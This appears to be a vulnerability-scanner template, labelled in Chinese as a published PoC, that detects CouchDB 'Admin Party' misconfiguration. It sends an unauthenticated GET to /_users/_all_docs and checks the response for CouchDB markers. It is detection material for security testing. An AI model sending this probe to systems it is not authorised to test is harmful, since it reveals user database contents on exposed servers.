漏洞描述
Requests made against CouchDB are done in the context of an admin user.
couchdb-admin-party: CouchDB Admin Party
PoC代码[已公开]
id: couchdb-admin-party
info:
name: CouchDB Admin Party
author: organiccrap
severity: high
verified: false
description: |-
Requests made against CouchDB are done in the context of an admin user.
tags: couchdb,admin,party
created: 2024/04/04
rules:
r0:
request:
method: GET
path: /_users/_all_docs
expression: response.body.bcontains(b'total_rows') && response.body.bcontains(b'offset') && response.headers["server"].icontains("CouchDB/")
expression: r0()